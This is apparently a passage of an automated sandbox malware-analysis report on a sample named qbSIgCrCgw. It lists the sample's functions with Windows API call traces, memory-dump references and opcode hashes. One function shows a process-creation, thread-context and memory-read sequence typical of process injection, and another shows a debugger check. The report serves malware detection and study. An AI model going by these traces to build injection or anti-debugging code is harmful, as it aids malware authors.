                                                                                Function 003B3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 003B3A73
                                                                                  • Part of subcall function 003D1405: __lock.LIBCMT ref: 003D140B
                                                                                  • Part of subcall function 003B3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003B3AF3
                                                                                  • Part of subcall function 003B3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003B3B08
                                                                                  • Part of subcall function 003B3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003B3AA3,?), ref: 003B3D45
                                                                                  • Part of subcall function 003B3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,003B3AA3,?), ref: 003B3D57
                                                                                  • Part of subcall function 003B3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00471148,00471130,?,?,?,?,003B3AA3,?), ref: 003B3DC8
                                                                                  • Part of subcall function 003B3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,003B3AA3,?), ref: 003B3E48
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003B3AB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 924797094-0
                                                                                • Opcode ID: 06ffab8feec977ccfd3e6e8517f2cae103c4ae699bf976ab1f8644ddba48dba3
                                                                                • Instruction ID: cffc8592f36da2925df6cc026d23843d2ac3ae2667973e5c3b74b81e58c48191
                                                                                • Opcode Fuzzy Hash: 06ffab8feec977ccfd3e6e8517f2cae103c4ae699bf976ab1f8644ddba48dba3
                                                                                • Instruction Fuzzy Hash: 8E1190719043919BC311EF29EC45A5ABBF8FB94710F00892FF588872B1DB709984CB96
                                                                                Function 003DE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 003DEA29
                                                                                • __close_nolock.LIBCMT ref: 003DEA42
                                                                                  • Part of subcall function 003D7BDA: __getptd_noexit.LIBCMT ref: 003D7BDA
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                • String ID:
                                                                                • API String ID: 1046115767-0
                                                                                • Opcode ID: 3d3612a9529114618d1605070489214dd3a05792c8b0f544a4642e311930da6d
                                                                                • Instruction ID: e20abf0eccf4e08182960b5331b89e6fab21b29d6671b3170d39905389965537
                                                                                • Opcode Fuzzy Hash: 3d3612a9529114618d1605070489214dd3a05792c8b0f544a4642e311930da6d
                                                                                • Instruction Fuzzy Hash: AB11ACB3809A118ED313BB68F8423197E606F82331F260343E4345F3E2DBB88C4096A5
                                                                                Function 003CF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003D395C: __FF_MSGBANNER.LIBCMT ref: 003D3973
                                                                                  • Part of subcall function 003D395C: __NMSG_WRITE.LIBCMT ref: 003D397A
                                                                                  • Part of subcall function 003D395C: RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
                                                                                • std::exception::exception.LIBCMT ref: 003CF51E
                                                                                • __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                  • Part of subcall function 003D6805: RaiseException.KERNEL32(?,?,0000000E,00466A30,?,?,?,003CF538,0000000E,00466A30,?,00000001), ref: 003D6856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: 44ac7b3476690f5f7aa9154e05e702adc6b7c227a2d1f60bf39c45319b3f896b
                                                                                • Instruction ID: e03dca00a71d2657d62342ce25e188907cc62891023a16d7bc6e9f04ecd0eeb2
                                                                                • Opcode Fuzzy Hash: 44ac7b3476690f5f7aa9154e05e702adc6b7c227a2d1f60bf39c45319b3f896b
                                                                                • Instruction Fuzzy Hash: 27F0C83250421D6BD706BF99FD02EEE77AD9F05364F60802BFA14D6281DBB0DA4097A9
                                                                                Function 003D35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __lock_file.LIBCMT ref: 003D3629
                                                                                  • Part of subcall function 003D4E1C: __lock.LIBCMT ref: 003D4E3F
                                                                                • __fclose_nolock.LIBCMT ref: 003D3634
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 49c08599b20aacadf1b46f6e20a7cb677f62c881e48b289ba2fea0d67214d89c
                                                                                • Instruction ID: 1ad4e83ef95b651bf842279c1579dbede08c75499a96400f2731b7833c39a0b3
                                                                                • Opcode Fuzzy Hash: 49c08599b20aacadf1b46f6e20a7cb677f62c881e48b289ba2fea0d67214d89c
                                                                                • Instruction Fuzzy Hash: A2F0B473801614AAD7137B65A84276EBBA06F41730F26811BE460AF3C1CB7CCF059F96
                                                                                Function 0100878D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01008F4B
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01008FE1
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01009003
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                • Instruction ID: b80eed1f6c2b6175858db84523520468a3f3b2824cbbc6e0b6742988bd7d40ca
                                                                                • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                • Instruction Fuzzy Hash: 2E12BD24E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4E81CF5A
                                                                                Function 003D2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __flush.LIBCMT ref: 003D2A0B
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __flush__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 4101623367-0
                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction ID: c14a647d749842037dacf1e920b2e1507c98864a27955dfb704b2c605bf42d23
                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction Fuzzy Hash: FB41D6727007069FDB2A8F69E89056FB7A6EF64360B25852FE845CB340EB70DD508B50
                                                                                Function 003CED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: d3d0f4039df99ec19dd54856991e57351533f9cdb6d1cf4f89cc00871f00cebb
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 7031E5B1A00105DFC71ADF58C498A69FBB6FF49340B6586A9E40ACB656DB30EDC1CB90
                                                                                Function 00429A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: aa62f0d45e422867c2f2db445daa8a2ab25044f6a4cd324535327704dca15d15
                                                                                • Instruction ID: 8e968072bfc60647fb3c4c305afa3de7c95bc0a676a2685310717eba3ff6d503
                                                                                • Opcode Fuzzy Hash: aa62f0d45e422867c2f2db445daa8a2ab25044f6a4cd324535327704dca15d15
                                                                                • Instruction Fuzzy Hash: CB4138706046518FDB25DF18C484F1ABBE0AF45308F1989ACE9968B762C376EC45DF42
                                                                                Function 003B41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B4214: FreeLibrary.KERNEL32(00000000,?), ref: 003B4247
                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003B39FE,?,00000001), ref: 003B41DB
                                                                                  • Part of subcall function 003B4291: FreeLibrary.KERNEL32(00000000), ref: 003B42C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load
                                                                                • String ID:
                                                                                • API String ID: 2391024519-0
                                                                                • Opcode ID: 60213c9f0f6ce2668575f3e072a654c46a338d782d876f676bd629709b778e32
                                                                                • Instruction ID: afc47737da72232ff63cd11e7fa457dfed3b22a0c32546d79c120f488692b2a8
                                                                                • Opcode Fuzzy Hash: 60213c9f0f6ce2668575f3e072a654c46a338d782d876f676bd629709b778e32
                                                                                • Instruction Fuzzy Hash: 5F11EB31700315BADB16AB70DC06FEE77A99F40704F104829F656AE5C2DB74DA00AB68
                                                                                Function 00429B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: c7f0764858382bd6b75d7d7b6e1aefb46f50b6f2c226bbdf623b99b470edbbe9
                                                                                • Instruction ID: 482fe62cf227dd6e36813e1b1de54a51da2831a641a1fc629d67bb6064170e94
                                                                                • Opcode Fuzzy Hash: c7f0764858382bd6b75d7d7b6e1aefb46f50b6f2c226bbdf623b99b470edbbe9
                                                                                • Instruction Fuzzy Hash: A0211570608641CFDB25DF68C444F2ABBE1BF85304F15896CEA968B622C732EC45DF52
                                                                                Function 003DAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 003DAFC0
                                                                                  • Part of subcall function 003D7BDA: __getptd_noexit.LIBCMT ref: 003D7BDA
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                • String ID:
                                                                                • API String ID: 1144279405-0
                                                                                • Opcode ID: 532b671557cf7d29a24618ff18de4eaeec0304c580fd4b0fde7360242d06e1bb
                                                                                • Instruction ID: ea086078806fb052e1511cd346a3f5c6719988c3c20142c7479000a87c1ba4be
                                                                                • Opcode Fuzzy Hash: 532b671557cf7d29a24618ff18de4eaeec0304c580fd4b0fde7360242d06e1bb
                                                                                • Instruction Fuzzy Hash: E6119DB38056009FD7136FA4B80275ABA60AF41331F274243E4744F3E2D7B589508BA2
                                                                                Function 003B39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                • Instruction ID: 9c0de033a1321e7d7d3bca4e863fe585b9b1df434c8ecec6646fdbadc5b95dcf
                                                                                • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                • Instruction Fuzzy Hash: 4D01497150010DBFCF06EF64C9918FFBB78EF10344F508026B6659B596EA309A49DF64
                                                                                Function 003D2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 003D2AED
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                • Opcode ID: e4afc2207f63f5acb4e2b0b488b24fc561fd5f4b3533ed4f0fa744f52582e786
                                                                                • Instruction ID: 3fff6078f0cbd909583d7baebeea2c8ca3969a93b9d528e7da5c357cad058284
                                                                                • Opcode Fuzzy Hash: e4afc2207f63f5acb4e2b0b488b24fc561fd5f4b3533ed4f0fa744f52582e786
                                                                                • Instruction Fuzzy Hash: 1CF06233A00205ABDF23AF65AC0679F76A5BF10310F164417F4249F391DB788A62DB51
                                                                                Function 003B4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,003B39FE,?,00000001), ref: 003B4286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: df15696d91f35a0aecfc107455ef12a1a735cd8f387ed54fbdd6514483e6f76a
                                                                                • Instruction ID: 71f3bf3e3bc34f3c4f99a79c924eef70392b50d962605cac31a0eb6a611589f2
                                                                                • Opcode Fuzzy Hash: df15696d91f35a0aecfc107455ef12a1a735cd8f387ed54fbdd6514483e6f76a
                                                                                • Instruction Fuzzy Hash: 6CF01C71505701CFCB369F64E490856B7F5AF053193258E3EF2D68AA11C7719840EB54
                                                                                Function 003B40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B40C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                • Opcode ID: c733f436bc38984369b6a7d6cddd529ca8b1abec4db284698e0d080a24f4eeaf
                                                                                • Instruction ID: 3922159fb537f6b98da15fdb2c9b34b5ef2abc85d48c8089d45dadacd5cf4026
                                                                                • Opcode Fuzzy Hash: c733f436bc38984369b6a7d6cddd529ca8b1abec4db284698e0d080a24f4eeaf
                                                                                • Instruction Fuzzy Hash: 6FE07D335001241BCB12A254DC42FEA339CDF88690F090171F905D7204D96499808690
                                                                                Function 0100978C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: 632af1a37ec074ccedfe027155f1298dbd4ad9ccd32af30649876640bc0a1872
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 7AE0BF7594010DEFDB01EFA8D5496DE7BB4FF04301F1045A5FD05D7681DB309E548A62
                                                                                Function 01009790 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: a8fca6a8a8448fa8b12b1fa4ea65118805db52793f35cd48086f72182a980d45
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: FEE0BF7594010D9FDB00EFA8D54969E7BB4EF04301F104165FD0592281D6309D508A62

                                                                                Non-executed Functions

                                                                                Function 0041F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0041F87D
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041F8DC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0041F919
